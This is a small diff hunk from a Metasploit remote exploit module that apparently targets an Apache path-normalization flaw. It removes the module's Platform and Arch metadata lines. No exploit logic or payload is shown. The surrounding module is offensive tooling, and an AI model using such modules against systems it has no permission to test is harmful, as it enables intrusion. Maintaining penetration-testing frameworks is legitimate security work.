@@ -38,8 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2021-05-10',
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
         'DefaultOptions' => {
           'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',
           'RPORT' => 443,
